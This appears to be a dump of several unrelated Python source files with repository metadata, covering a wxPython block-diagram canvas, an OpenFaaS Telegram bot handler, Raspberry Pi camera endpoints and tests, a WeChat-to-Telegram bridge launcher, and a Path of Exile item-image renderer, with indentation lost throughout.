from wx.lib.floatcanvas.Utilities import BBox
class MovingObjectMixin:
"""
Methods required for a Moving object
"""
def GetOutlinePoints(self):
BB = self.BoundingBox
OutlinePoints = N.array(
(
(BB[0, 0], BB[0, 1]),
(BB[0, 0], BB[1, 1]),
(BB[1, 0], BB[1, 1]),
(BB[1, 0], BB[0, 1]),
)
)
return OutlinePoints
class ConnectorObjectMixin:
"""
Mixin class for DrawObjects that can be connected with lines
Note that this version only works for Objects that have an "XY" attribute:
that is, one that is derived from XYObjectMixin.
"""
def GetConnectPoint(self, other=None):
return self.XY
class CanvasMixin(object):
def __init__(self, *args, **kwargs):
self._CanvasSet = False
def SetupCanvasMixin(self):
wx.CallAfter(self._SetupCanvasMixin)
def _SetupCanvasMixin(self):
if not self._CanvasSet:
self.Moving = False
self.Canvas.Bind(FC.EVT_MOTION, self.OnMove)
self.Canvas.Bind(FC.EVT_LEFT_UP, self.OnLeftUp)
self.Canvas.ZoomToBB()
def ObjectHit(self, object):
if not self.Moving:
self.Moving = True
self.StartPoint = object.HitCoords
self.MovingObject = object
def OnMove(self, event):
"""
Moves the grabbed object to follow the mouse while dragging
"""
if self.Moving:
# Draw the Moving Object:
self.MovingObject.Move(event.Coords - self.StartPoint)
self.StartPoint = event.Coords
self.Canvas.Draw(True)
def OnLeftUp(self, event):
if self.Moving:
self.Moving = False
class Block(FC.Rectangle, MovingObjectMixin, ConnectorObjectMixin):
"""
Block Object that can be moved
"""
def __init__(
self, XY, WH, Text,
LineColor='BlockBorderColor', LineStyle='Transparent', LineWidth=4,
FillColor='BlockBackgroundColor', FillStyle='Solid',
InForeground=False, FontFamily='Monaco'
):
self.__LineWidth = LineWidth
self.__LineColor = LineColor
self.__LineStyle = LineStyle
self.__FillColor = FillColor
self.__FillStyle = FillStyle
self.Text = Text
self.__Font = wx.Font(
wx.FontInfo(18).FaceName(FontFamily).Family(wx.FONTFAMILY_SCRIPT)
)
if not self.__Font.IsOk():
self.__Font = wx.Font(wx.FontInfo(18))
print('Font fell back to the default face')
FC.Rectangle.__init__(
self, XY, WH,
LineColor=self.__LineColor, LineStyle=self.__LineStyle,
LineWidth=self.__LineWidth, FillColor=self.__FillColor,
FillStyle=self.__FillStyle, InForeground=False
)
def _Draw(self, dc, WorldToPixel, ScaleWorldToPixel, HTdc=None):
super()._Draw(dc, WorldToPixel, ScaleWorldToPixel, HTdc=HTdc)
gc = wx.GraphicsContext.Create(dc)
gc.SetFont(self.__Font, wx.TheColourDatabase.Find('TextColor'))
# FIXME: currently only supports a single line of text; there is no layout engine yet
text_w, text_h = gc.GetTextExtent(self.Text)
# print('text extent:', text_w, text_h)
X, Y = WorldToPixel(self.XY)
W, H = ScaleWorldToPixel(self.WH)
# this is the top left point of the text
text_x = X + self.__LineWidth + (W - self.__LineWidth * 2 - text_w) / 2
text_y = Y + self.__LineWidth + (H - self.__LineWidth * 2 - text_h) / 2
gc.DrawText(self.Text, text_x, text_y)
def GetConnectPoint(self, other=None):
x, y = self.XY
w, h = self.WH
center_x, center_y = (x + w / 2, y + h / 2)
# No other object to compare against; fall back to the centre point
if other is None:
return (center_x, center_y)
else:
other_x = other.GetConnectPoint()[0]
if other_x >= center_x:
# other block is at the right side
return x + w, center_y
else:
# other block is at the left side
return x, center_y
def OnHover(self, obj):
self.SetLineStyle('Solid')
self.SetLineColor('BlockHoverBorderColor')
if self._Canvas:
self._Canvas.Draw(True)
def OffHover(self, obj):
self.SetLineStyle(self.__LineStyle)
self.SetLineColor(self.__LineColor)
if self._Canvas:
self._Canvas.Draw(True)
class ConnectorLine(FC.LineOnlyMixin, FC.DrawObject,):
"""
A Line that connects two objects --
it uses the objects to get its coordinates
"""
# fixme: this should be added to the Main FloatCanvas Objects some day.
def __init__(self, Object1, Object2,
LineColor="ConnectorLineColor", LineStyle="Solid",
LineWidth=4, InForeground=False):
FC.DrawObject.__init__(self, InForeground=InForeground)
self.Object1 = Object1
self.Object2 = Object2
self.LineColor = LineColor
self.LineStyle = LineStyle
self.LineWidth = LineWidth
self.CalcBoundingBox()
self.SetPen(LineColor, LineStyle, LineWidth)
self.HitLineWidth = max(LineWidth, self.MinHitLineWidth)
def CalcBoundingBox(self):
self.BoundingBox = BBox.fromPoints(
(
self.Object1.GetConnectPoint(self.Object2),
self.Object2.GetConnectPoint(self.Object1)
)
)
if self._Canvas:
self._Canvas.BoundingBoxDirty = True
def _Draw(self, dc, WorldToPixel, ScaleWorldToPixel, HTdc=None):
p0 = self.Object1.GetConnectPoint(self.Object2)
p3 = self.Object2.GetConnectPoint(self.Object1)
# We'll use a dead simple way to get the two control points:
# The control points p1 and p2 are on the lines
# perpendicular to the borders through points p0 and p3.
# That is,
# p1 lies on the line perpendicular to the border through p0,
# and p2 on the corresponding line through p3.
dx = p0[0] - p3[0]
left_point, right_point = (p0, p3) if dx < 0 else (p3, p0)
# dy = left_point[1] - right_point[1]
dx_abs = N.abs(dx)
# dy_abs = N.abs(dy)
# p1_y = left_point[1] + dy_abs * .2 if dy > 0 else left_point[1] - dy_abs * .2
# p2_y = right_point[1] - dy_abs * .2 if dy > 0 else right_point[1] + dy_abs * .2
p1_y = left_point[1]
p2_y = right_point[1]
p1 = (left_point[0] + dx_abs * .4), p1_y
p2 = (right_point[0] - dx_abs * .4), p2_y
Points = N.array(
(left_point, p1, p2, right_point)
)
Points = WorldToPixel(Points)
dc.SetPen(self.Pen)
# dc.DrawLines(Points)
dc.DrawSpline(Points)
if HTdc and self.HitAble:
HTdc.SetPen(self.HitPen)
# HTdc.DrawLines(Points)
HTdc.DrawSpline(Points)
``` |
{
"source": "JokerQyou/oled-clock",
"score": 3
} |
#### File: oled-clock/oled_clock/base.py
```python
class Object(dict):
def __init__(self, d):
super(Object, self).__init__()
self.update(d)
def __setattr__(self, name, value):
self[name] = value
def __getattr__(self, name):
return self[name]
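# Illustrative usage: attribute access maps straight onto the underlying dict, e.g.
#   o = Object({'hour': 7}); o.minute = 30; (o.hour, o['minute'])  # -> (7, 30)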
``` |
{
"source": "JokerQyou/openfaas-mobot",
"score": 2
} |
#### File: openfaas-mobot/mobot/handler.py
```python
from io import open
import json
from loguru import logger
from telegram import Bot, Update
from telegram.ext import Dispatcher
from .bot import handlers
with open('/var/openfaas/secrets/mobot-telegram-bot-token') as rf:
bot = Bot(token=rf.read().strip())  # strip the trailing newline that secret files often contain
dispatcher = Dispatcher(bot, None, workers=0, use_context=True)
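# workers=0 makes the dispatcher run handlers synchronously in this process,
# which suits a short-lived serverless invocation.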
# Register handlers
for handler in handlers:
dispatcher.add_handler(handler)
def handle(event, context):
try:
update = Update.de_json(json.loads(event.body), bot)
except Exception:
return {'statusCode': 400}
else:
dispatcher.process_update(update)
return {'statusCode': 200}
``` |
{
"source": "JokerQyou/pitools",
"score": 2
} |
#### File: pitools/examples/server.py
```python
from __future__ import unicode_literals
from flask import Flask
from pitools import camera
from pitools.sensors import bmp085
app = Flask(__name__)
app.register_blueprint(camera.blueprint)
app.register_blueprint(bmp085.blueprint, url_prefix='/sensors')
def serve():
app.run('0.0.0.0', 9876)
if __name__ == '__main__':
serve()
```
#### File: pitools/tests/test_camera.py
```python
from __future__ import unicode_literals
import io
import imghdr
import unittest
from flask import Flask
from pitools import camera
from picamera import PiCamera
app = Flask(__name__)
app.register_blueprint(camera.blueprint)
class CameraTestCase(unittest.TestCase):
def setUp(self):
self.app = app.test_client()
def tearDown(self):
pass
def test_01_setup_camera(self):
'''
setup_camera() should return an opened PiCamera instance
'''
with camera.setup_camera() as c:
assert isinstance(c, PiCamera)
assert not c.closed
def test_02_post_shot_api(self):
'''
Should fail with 405 with POST requests
'''
rv = self.app.post('/camera/shot')
assert 405 == rv.status_code
def test_03_get_shot_api(self):
'''
Should return an image with MIME of image/*
'''
rv = self.app.get('/camera/shot')
assert rv.content_type.startswith('image/')
print dir(rv)
with io.BytesIO() as photo:
photo.write(rv.get_data())
photo.flush()
photo.seek(0)
assert len(photo.read()) > 0
photo.seek(0)
assert 'jpeg' == imghdr.what('', photo.read())
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "JokerQyou/Wegram",
"score": 2
} |
#### File: Wegram/wegram/cli.py
```python
from __future__ import unicode_literals, print_function
import os
import logging
import json
os.environ['WEGRAM_FORWARD_TYPES'] = json.dumps([
1, 3, 34, 42, 47, 49, 62,
])
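# The numbers above are WeChat message-type codes to forward; the mapping is assumed from the
# web WeChat protocol (commonly 1=text, 3=image, 34=voice, 42=contact card, 47=sticker,
# 49=link/app message, 62=short video).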
if os.environ.get('ETH0_PUSH_CODE', None):
from .base import Eth0Adapter
TELEGRAM_ADAPTER = Eth0Adapter(os.environ['ETH0_PUSH_CODE'])
elif os.environ.get('TELEGRAM_BOT_TOKEN', None):
from .base import TelegramBotAdapter
TELEGRAM_ADAPTER = TelegramBotAdapter(os.environ['TELEGRAM_BOT_TOKEN'])
else:
raise RuntimeError('No Telegram adapter could be inited')
from weixinbot import weixin
def start():
# Logging to console
logger = logging.getLogger(__name__)
import coloredlogs
coloredlogs.install(level='DEBUG')
# Weixin bot init
wxbot = weixin.WebWeixin()
wxbot.telegram_adapter = TELEGRAM_ADAPTER
wxbot.start()
if __name__ == '__main__':
start()
``` |
{
"source": "jokerServer/PoE.py",
"score": 2
} |
#### File: PoE.py/poe/utils.py
```python
import binascii
import html
import json as js
import math
import os
import re
import threading
import unicodedata
import xml.etree.cElementTree as Etree
from collections import defaultdict
from collections import namedtuple
from io import BytesIO
from queue import Queue
import urllib3
from PIL import Image
from PIL import ImageDraw
from PIL import ImageFont
from PIL import ImageOps
from bs4 import BeautifulSoup as Soup
from poe.exceptions import AbsentItemBaseException
from poe.exceptions import OutdatedPoBException, RequestException
from poe.models import Weapon, Armour, PassiveSkill, Gem
from poe.price import ItemPriceQuery, CurrencyQuery
from .constants import *
re_range = re.compile(r'\(.+?\)')
# Simple cursor class for moving around the image: it tracks the current position
# so we don't have to keep adding and subtracting coordinates by hand.
def strip_unicode(text: str):
return ''.join((c for c in unicodedata.normalize('NFD', text) if unicodedata.category(c) != 'Mn'))
class Cursor:
def __init__(self, x_start):
self.x = 0
self.y = 0
self.x_start = x_start
# Return current pos of cursor
@property
def pos(self):
return self.x, self.y
def move_x(self, quantity):
self.x += quantity
def move_y(self, quantity):
self.y += quantity
def reset_x(self):
self.x = self.x_start
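# Typical pattern: start the cursor at the horizontal centre of the canvas, move_x() left by half
# the text width, draw at cur.pos, then reset_x() and move_y() down to the next line.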
# Resolve the data directory to an absolute path, because relative paths are unreliable here
_dir = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'data')
# Find links wrapped in [[]] returned by Gamepedia
reg = re.compile(r'\[\[[^\]]+\]\]')
try:
with open(f"{_dir}/keystones.json") as f:
keystones = js.load(f)
with open(f"{_dir}/ascendancy.json") as f:
asc_nodes = js.load(f)
with open(f"{_dir}/items.json") as f:
items = js.load(f)
except Exception:
pass
def unescape_to_list(props, ret_matches=False):
matches = reg.findall(props)
has_table = Soup(html.unescape(props)).select_one('table.mw-collapsed tr')
if not has_table:
for match in set(matches):
if '|' in match:
props = props.replace(match, match.split('|')[1].strip(']]'))
else:
props = props.replace(match, match.strip('[[]]'))
prop_list = html.unescape(props).replace('<br />', '<br>').split('<br>')
prop_list = [x.replace('<em class="tc -corrupted">', '').replace('</em>', '') for x in prop_list]
else:
# FIXME: non-iterable object
prop_list = [x.text for x in has_table]
if ret_matches:
return prop_list, matches
return prop_list
class ItemRender:
def __init__(self, flavor):
self.flavor = flavor.lower()
self.font = ImageFont.truetype(f'{_dir}//Fontin-SmallCaps.ttf', 15)
self.lore_font = ImageFont.truetype(f'{_dir}//Fontin-SmallCapsItalic.ttf', 15)
self.header_font = ImageFont.truetype(f'{_dir}//Fontin-SmallCaps.ttf', 20)
self.namebar_left = Image.open(f'{_dir}//{self.flavor}_namebar_left.png').convert('RGBA')
self.namebar_right = Image.open(f'{_dir}//{self.flavor}_namebar_right.png').convert('RGBA')
self.namebar_trans = Image.open(f'{_dir}//{self.flavor}_namebar_trans.png').convert('RGBA')
self.separator = Image.open(f'{_dir}//{self.flavor}_separator.png').convert('RGBA')
self.div_frame = Image.open(f'{_dir}//div_frame.png').convert('RGBA')
self.elder_badge = Image.open(f'{_dir}//elder_badge.png').convert('RGBA')
self.shaper_badge = Image.open(f'{_dir}//shaper_badge.png').convert('RGBA')
self.redeemer_badge = Image.open(f'{_dir}//redeemer_badge.png').convert('RGBA')
self.crusader_badge = Image.open(f'{_dir}//crusader_badge.png').convert('RGBA')
self.hunter_badge = Image.open(f'{_dir}//hunter_badge.png').convert('RGBA')
self.warlord_badge = Image.open(f'{_dir}//warlord_badge.png').convert('RGBA')
self.passive_frame = Image.open(f'{_dir}//passive_frame.png').convert('RGBA')
self.keystone_frame = Image.open(f'{_dir}//keystone_frame.png').convert('RGBA')
self.notable_frame = Image.open(f'{_dir}//notable_frame.png').convert('RGBA')
self.ascendancy_frame = Image.open(f'{_dir}//ascendancy_frame.png').convert('RGBA')
self.shaper_backgrounds = {
('1', '1'): Image.open(f'{_dir}//shaper_bg_1x1.png').convert('RGBA'),
('1', '2'): Image.open(f'{_dir}//shaper_bg_1x2.png').convert('RGBA'),
('1', '3'): Image.open(f'{_dir}//shaper_bg_1x3.png').convert('RGBA'),
('1', '4'): Image.open(f'{_dir}//shaper_bg_1x4.png').convert('RGBA'),
('2', '1'): Image.open(f'{_dir}//shaper_bg_2x1.png').convert('RGBA'),
('2', '2'): Image.open(f'{_dir}//shaper_bg_2x2.png').convert('RGBA'),
('2', '3'): Image.open(f'{_dir}//shaper_bg_2x3.png').convert('RGBA'),
('2', '4'): Image.open(f'{_dir}//shaper_bg_2x4.png').convert('RGBA'),
}
self.elder_backgrounds = {
('1', '1'): Image.open(f'{_dir}//elder_bg_1x1.png').convert('RGBA'),
('1', '3'): Image.open(f'{_dir}//elder_bg_1x3.png').convert('RGBA'),
('1', '4'): Image.open(f'{_dir}//elder_bg_1x4.png').convert('RGBA'),
('2', '1'): Image.open(f'{_dir}//elder_bg_2x1.png').convert('RGBA'),
('2', '2'): Image.open(f'{_dir}//elder_bg_2x2.png').convert('RGBA'),
('2', '3'): Image.open(f'{_dir}//elder_bg_2x3.png').convert('RGBA'),
('2', '4'): Image.open(f'{_dir}//elder_bg_2x4.png').convert('RGBA'),
}
# A namedtuple to handle properties.
# This works fairly well except for Separators which is kinda hacky
self.prop = namedtuple('Property', ['title', 'text', 'color'])
# I don't know why PIL does this, but spacing with fonts is not consistent,
# this means I have to compensate by spacing more after separators and stuff
self.last_action = str()
# Go through our total properties and image to get the image/box size
# I feel the code is a bit redundant considering I have two instances
# of an if-fest, calc_size and sort_stats.
# TODO: reduce redundancy
def calc_size(self, stats, header):
width = self.header_font.getsize(header)[0] + (self.namebar_left.size[0] * 2) + 4
height = 0
last_sep = False
for stat in stats:
if stat.title == "Separator":
height += SEPARATOR_HEIGHT + SEPARATOR_SPACING
last_sep = True
continue
elif stat.title == "Elemental Damage:":
if last_sep:
height += SEPARATOR_SPACING
else:
height += STAT_SPACING
height += STAT_HEIGHT
stat_text = stat.title
for element in stat.text.keys():
stat_text += f" {stat.text[element]}"
last_sep = False
elif stat.title == "Requires":
if last_sep:
height += SEPARATOR_SPACING
else:
height += STAT_SPACING
height += STAT_HEIGHT
stat_text = stat.title
for attr in stat.text.keys():
stat_text += f" {attr.title()} {stat.text[attr]}{'' if list(stat.text.keys())[-1] == attr else ','}"
last_sep = False
elif stat.title == "Lore" or stat.title == "Reminder":
if type(stat.text) is list:
ht = LINE_SPACING
for line in stat.text:
w = self.lore_font.getsize(line)
ht += STAT_HEIGHT
if w[0] > width:
width = w[0]
height += ht + STAT_SPACING
else:
w = self.lore_font.getsize(stat.text)
if w[0] > width:
width = w[0]
height += STAT_HEIGHT
last_sep = False
continue
elif stat.title == "Image":
height += stat.text.size[1] + IMAGE_PADDING
last_sep = False
else:
if last_sep:
height += SEPARATOR_SPACING
else:
height += STAT_SPACING
height += STAT_HEIGHT
stat_text = f"{stat.title}{stat.text}"
last_sep = False
if stat.title != "Image":
# FIXME: referenced before assignment
w = self.font.getsize(stat_text)
else:
w = stat.text.size
if w[0] > width:
width = w[0]
# 34 is the 17px padding from both sides
return width + 34, height + self.namebar_trans.size[1] + 25
def sort_stats(self, item):
stats = list()
separator = self.prop("Separator", None, None)
if not isinstance(item, PassiveSkill):
if 'weapon' in item.tags:
stats.append(self.prop(item.item_class, '', DESC_COLOR))
if item.quality:
stats.append(self.prop("Quality: ", f"+{item.quality}%", PROP_COLOR))
if item.physical_damage:
stats.append(self.prop("Physical Damage: ", item.physical_damage, PROP_COLOR))
elements = {
element.split('_')[0]: getattr(item, element) for element in [
'fire_damage', 'cold_damage', 'lightning_damage'
] if getattr(item, element)
}
if elements:
stats.append(self.prop("Elemental Damage:", elements, None))
if item.chaos_damage:
stats.append(self.prop("Chaos Damage: ", item.chaos_damage, CHAOS_COLOR))
if item.critical_chance:
stats.append(self.prop("Critical Strike Chance: ", item.critical_chance, None))
if item.attack_speed:
stats.append(self.prop("Attacks Per Second: ", item.attack_speed, PROP_COLOR))
if int(item.range):
stats.append(self.prop("Weapon Range: ", item.range, None))
stats.append(separator)
elif 'armour' in item.tags:
if item.quality:
stats.append(self.prop("Quality: ", f"+{item.quality}%", PROP_COLOR))
if item.block:
stats.append(self.prop("Chance To Block: ", f"{item.block}%", PROP_COLOR))
if item.armour:
stats.append(self.prop("Armour: ", item.armour, PROP_COLOR))
if item.evasion:
stats.append(self.prop("Evasion: ", item.evasion, PROP_COLOR))
if item.energy_shield:
stats.append(self.prop("Energy Shield: ", item.energy_shield, PROP_COLOR))
stats.append(separator)
elif 'ring' in item.tags or 'amulet' in item.tags or 'belt' in item.tags:
if item.quality:
stats.append(self.prop("Quality: ", f"+{item.quality}%", PROP_COLOR))
stats.append(separator)
elif 'gem' in item.tags:
stats.append(self.prop(item.gem_tags.replace(',', ', '), '', DESC_COLOR))
if item.stats_per_level[0]['mana multiplier']:
stats.append(self.prop("Mana Multiplier: ", f"{item.stats_per_level[0]['mana multiplier']}%", None))
if item.radius:
stats.append(self.prop("Radius: ", item.radius, None))
if not item.is_aura:
# Enlighten, Enhance, etc. only go up to level 10
try:
stats.append(self.prop(
"Mana Cost: ", f"({item.stats_per_level[1]['mana cost']}-{item.stats_per_level[20]['mana cost']})", PROP_COLOR)
)
except KeyError:
stats.append(self.prop(
"Mana Cost: ", f"({item.stats_per_level[1]['mana cost']}-{item.stats_per_level[10]['mana cost']})", PROP_COLOR)
)
else:
stats.append(self.prop("Mana Reserved: ", f"{item.stats_per_level[0]['mana cost']}%", None))
# Enlighten, Enhance, etc. only go up to level 10
try:
if item.stats_per_level[20]['stored uses']:
stats.append(self.prop("Stored Uses", str(item.stats_per_level[20]['stored uses']), None))
except KeyError:
if item.stats_per_level[10]['stored uses']:
stats.append(self.prop("Stored Uses", str(item.stats_per_level[10]['stored uses']), None))
if item.stats_per_level[0]['cooldown']:
stats.append(self.prop("Cooldown Time: ", f"{item.stats_per_level[0]['cooldown']} sec", None))
if item.cast_time:
stats.append(self.prop("Cast Time: ", f"{item.cast_time} sec", None))
if item.stats_per_level[0]['critical strike chance']:
stats.append(
self.prop("Critical Strike Chance: ", f"{item.stats_per_level[0]['critical strike chance']}%", None)
)
if item.stats_per_level[0]['damage effectiveness']:
stats.append(
self.prop("Damage Effectiveness: ", f"{item.stats_per_level[0]['damage effectiveness']}%", None)
)
stats.append(separator)
elif item.base == 'Prophecy':
if len(item.lore.split(' ')) > 7:
lore = item.lore.split(' ')
sep_lore = [lore[x:x + 7] for x in range(0, len(lore), 7)]
for line in sep_lore:
stats.append(self.prop('Lore', ' '.join(line), UNIQUE_COLOR))
else:
stats.append(self.prop('Lore', item.lore, UNIQUE_COLOR))
stats.append(separator)
obj_list, matches = unescape_to_list(item.objective, ret_matches=True)
if 'while holding' in obj_list[0]:
item_name = matches[3].split('|')[1].strip(']]')
pre_holding = obj_list[0].split(' while holding ')[0]
new_obj = f"{pre_holding} while holding {item_name}"
else:
new_obj = obj_list[0]
if len(new_obj.split(' ')) > 7:
obj_split = new_obj.split(' ')
obj_sep = [obj_split[x:x + 7] for x in range(0, len(obj_split), 7)]
for line in obj_sep:
stats.append(self.prop(' '.join(line), '', None))
else:
stats.append(self.prop(new_obj, '', None))
stats.append(separator)
stats.append(self.prop("Seal Cost: ", item.seal_cost, DESC_COLOR))
if item.requirements.has_reqs and item.base != "Prophecy":
reqs = {}
if item.requirements.level:
reqs['level'] = item.requirements.level
if item.requirements.str:
reqs['str'] = item.requirements.str
if item.requirements.dex:
reqs['dex'] = item.requirements.dex
if item.requirements.int:
reqs['int'] = item.requirements.int
stats.append(self.prop("Requires", reqs, None))
stats.append(separator)
try:
if item.enchant:
stats.append(self.prop(item.enchant, '', CRAFTED))
stats.append(separator)
except AttributeError:
pass
if 'gem' in item.tags:
if len(item.description.split(' ')) > 7:
desc = item.description.split(' ')
description = [desc[x:x + 7] for x in range(0, len(desc), 7)]
for line in description:
stats.append(self.prop(' '.join(line), '', GEM_COLOR))
else:
stats.append(self.prop(item.description, '', GEM_COLOR))
stats.append(separator)
if item.quality_bonus:
stats.append(self.prop("Per 1% Quality:", "", DESC_COLOR))
if '<br>' in item.quality_bonus:
for bonus in item.quality_bonus.split('<br>'):
stats.append(self.prop(bonus, "", PROP_COLOR))
else:
stats.append(self.prop(item.quality_bonus, "", PROP_COLOR))
stats.append(separator)
stat_text = item.stat_text.split("<br>")
for stat in stat_text:
if len(stat.split(' ')) > 7:
st = stat.split(' ')
sep_stat = [st[x:x + 7] for x in range(0, len(st), 7)]
for sep in sep_stat:
stats.append(self.prop(' '.join(sep), "", PROP_COLOR))
else:
stats.append(self.prop(stat, "", PROP_COLOR))
stats.append(separator)
stats.append(self.prop("Gem Help", "Place into an item socket of the right", DESC_COLOR))
stats.append(self.prop("Gem Help", "colour to gain this skill. Right click to", DESC_COLOR))
stats.append(self.prop("Gem Help", "remove from a socket.", DESC_COLOR))
if 'gem' not in item.tags and item.base != "Prophecy":
if item.implicits:
implicits = unescape_to_list(item.implicits)
else:
implicits = None
if item.explicits:
explicits = unescape_to_list(item.explicits)
else:
explicits = None
if explicits and explicits[0].startswith('{'):
implicits = [explicits[0]]
explicits.pop(0)
if implicits:
for implicit in implicits:
if "{crafted}" in implicit or "(enchant)" in implicit:
stats.append(self.prop(implicit.replace('{crafted}', '').replace('(enchant)', ''),
'', CRAFTED))
stats.append(separator)
else:
stats.append(self.prop(implicit.replace('(implicit)', ''), '', PROP_COLOR))
stats.append(separator)
if explicits:
for explicit in explicits:
if explicit.lower() == "corrupted":
stats.append(self.prop(explicit, '', CORRUPTED))
elif "(crafted)" in explicit or "{crafted}" in explicit:
stats.append(self.prop(explicit.replace('{crafted}', '').replace(' (crafted)', ''),
'', CRAFTED))
else:
stats.append(self.prop(explicit, '', PROP_COLOR))
if item.lore:
if stats[-1] is not separator:
stats.append(separator)
lore = self.prop('Lore', unescape_to_list(item.lore), UNIQUE_COLOR)
stats.append(lore)
if item.icon:
http = urllib3.PoolManager()
def ico(icon):
r = http.request('GET', icon, preload_content=False)
im = Image.open(BytesIO(r.read()))
im = im.convert('RGBA')
return im
try:
if item.skill_icon:
stats.append(self.prop('Image', ico(item.skill_icon), None))
except AttributeError:
pass
stats.append(self.prop('Image', ico(item.icon), None))
else:
if item.name:
stats.append(self.prop('', item.name, DESC_COLOR))
passive_type = None
if item.asc_class:
passive_type = f"{item.asc_class} Notable Passive Skill"
elif item.is_notable:
passive_type = "Notable Passive Skill"
elif item.is_keystone:
passive_type = "Keystone"
stats.append(self.prop(passive_type, '', NORMAL_COLOR))
for line in unescape_to_list(item.stat_text):
stats.append(self.prop(line, '', PROP_COLOR))
if item.icon:
http = urllib3.PoolManager()
def ico(icon):
r = http.request('GET', icon, preload_content=False)
im = Image.open(BytesIO(r.read()))
im = im.convert('RGBA')
return im
try:
# FIXME: unresolved attribute
if item.skill_icon:
stats.append(self.prop('Image', ico(item.skill_icon), None))
except AttributeError:
pass
stats.append(self.prop('Image', ico(item.icon), None))
if item.reminder_text:
lines = unescape_to_list(item.reminder_text)
for line in lines:
if len(line.split(' ')) > 7:
lore = line.split(' ')
sep_lore = [lore[x:x + 7] for x in range(0, len(lore), 7)]
for set_line in sep_lore:
stats.append(self.prop('Reminder', ' '.join(set_line), DESC_COLOR))
else:
stats.append(self.prop("Reminder", line, DESC_COLOR))
if item.flavor_text:
if len(item.flavor_text.split(' ')) > 7:
lore = item.flavor_text.split(' ')
sep_lore = [lore[x:x + 7] for x in range(0, len(lore), 7)]
for line in sep_lore:
stats.append(self.prop('Lore', ' '.join(line), UNIQUE_COLOR))
else:
stats.append(self.prop("Lore", item.flavor_text, UNIQUE_COLOR))
return stats
def render_divcard(self, card):
http = urllib3.PoolManager()
r = http.request('GET', card.card_art, preload_content=False)
art = Image.open(BytesIO(r.read()))
art = art.convert('RGBA')
item = Image.new('RGBA', self.div_frame.size, (255, 0, 0, 0))
cur = Cursor(self.div_frame.size[0] // 2)
cur.reset_x()
cur.move_x((art.size[0] // 2) * -1)
cur.move_y(47)
item.alpha_composite(art, cur.pos)
item.alpha_composite(self.div_frame, (0, 0))
cur.reset_x()
d = ImageDraw.Draw(item)
cur.y = 0
cur.move_y(20)
header_font = ImageFont.truetype(f'{_dir}//Fontin-SmallCaps.ttf', 20)
cur.move_x((header_font.getsize(card.name)[0] // 2) * -1)
d.text(cur.pos, card.name, fill='black', font=header_font)
cur.reset_x()
cur.x = 77
cur.y = 316
cur.move_x((self.font.getsize(card.stack_size)[0] // 2) * -1)
d.text(cur.pos, card.stack_size, fill=None, font=self.font)
cur.y = 384
cur.reset_x()
fill = flavor_color[card.reward_flavor]
cur.move_x((self.font.getsize(card.reward)[0] // 2) * -1)
d.text(cur.pos, card.reward, fill=fill, font=self.font)
cur.reset_x()
if card.is_corrupted:
cur.y = 384 + self.font.getsize(card.reward)[1] + 6
cur.move_x((self.font.getsize("Corrupted")[0] // 2) * -1)
d.text(cur.pos, "Corrupted", fill=CORRUPTED, font=self.font)
cur.reset_x()
cur.y = 536
first_lore = unescape_to_list(card.lore)
for first_line in first_lore:
text = first_line
if len(text.split(' ')) > 7:
lore = text.split(' ')
sep_lore = [lore[x:x + 7] for x in range(0, len(lore), 7)]
for line in sep_lore:
joined_line = ' '.join(line)
cur.move_y(STAT_SPACING)
cur.move_x((self.font.getsize(joined_line)[0] // 2) * -1)
d.text(cur.pos, joined_line, fill=UNIQUE_COLOR, font=self.lore_font)
cur.move_y(self.lore_font.getsize(joined_line)[1])
cur.reset_x()
else:
cur.move_y(STAT_SPACING)
cur.move_x((self.font.getsize(text)[0] // 2) * -1)
d.text(cur.pos, text, fill=UNIQUE_COLOR, font=self.lore_font)
cur.move_y(self.lore_font.getsize(text)[1])
cur.reset_x()
return item
def render(self, poe_item):
stats = self.sort_stats(poe_item)
fill = flavor_color[self.flavor]
try:
if self.header_font.getsize(poe_item.name) > self.header_font.getsize(poe_item.base):
header = poe_item.name
else:
header = poe_item.base
except (AttributeError, TypeError):
header = poe_item.name
box_size = self.calc_size(stats, header)
center_x = box_size[0] // 2
item = Image.new('RGBA', box_size, color='black')
cur = Cursor(center_x)
if not isinstance(poe_item, PassiveSkill):
try:
if poe_item.influences:
apply_influences = []
for influence in poe_item.influences:
if influence == "shaper":
apply_influences.append(self.shaper_badge)
elif influence == "elder":
apply_influences.append(self.elder_badge)
elif influence == "redeemer":
apply_influences.append(self.redeemer_badge)
elif influence == "crusader":
apply_influences.append(self.crusader_badge)
elif influence == "hunter":
apply_influences.append(self.hunter_badge)
elif influence == "warlord":
apply_influences.append(self.warlord_badge)
if poe_item.rarity.lower() in ['rare', 'unique', 'relic']:
self.namebar_left.alpha_composite(apply_influences[0], (8, 18))
if len(apply_influences) > 1:
self.namebar_right.alpha_composite(apply_influences[1], (9, 18))
else:
self.namebar_right.alpha_composite(apply_influences[0], (9, 18))
else:
self.namebar_left.alpha_composite(apply_influences[0], (4, 6))
if len(apply_influences) > 1:
self.namebar_right.alpha_composite(apply_influences[1], (1, 6))
else:
self.namebar_right.alpha_composite(apply_influences[0], (1, 6))
except AttributeError:
pass
item.paste(self.namebar_left, cur.pos)
cur.move_x(self.namebar_left.size[0])
transformed_namebar = self.namebar_trans.resize((item.size[0] - (self.namebar_left.size[0] * 2),
self.namebar_trans.size[1]))
item.paste(transformed_namebar, cur.pos)
cur.move_x(transformed_namebar.size[0])
item.paste(self.namebar_right, cur.pos)
cur.reset_x()
d = ImageDraw.Draw(item)
cur.move_y(8)
cur.move_x((self.header_font.getsize(poe_item.name)[0] // 2) * -1)
d.text(cur.pos, poe_item.name, fill=fill, font=self.header_font)
if not isinstance(poe_item, PassiveSkill):
cur.move_y(2 + self.header_font.getsize(poe_item.name)[1])
else:
cur.move_y(self.header_font.getsize(poe_item.name)[1] // 2)
cur.reset_x()
if not isinstance(poe_item, PassiveSkill):
if 'gem' not in poe_item.tags and poe_item.base != "Prophecy":
if poe_item.base not in poe_item.name:
cur.move_x((self.header_font.getsize(poe_item.base)[0] // 2) * -1)
d.text(cur.pos, poe_item.base, fill=fill, font=self.header_font)
cur.reset_x()
cur.y = 0
# FIXME: referenced before assignment
cur.move_y(transformed_namebar.size[1])
else:
pass
for stat in stats:
if stat.title == "Separator":
self.last_action = "Separator"
cur.move_x((self.separator.size[0] // 2) * -1)
cur.move_y(SEPARATOR_SPACING + 2)
item.paste(self.separator, cur.pos)
cur.reset_x()
elif stat.title == "Elemental Damage:":
stat_text = stat.title
for element in stat.text.keys():
stat_text += f" {stat.text[element]}"
cur.move_x((self.font.getsize(stat_text)[0] // 2) * -1)
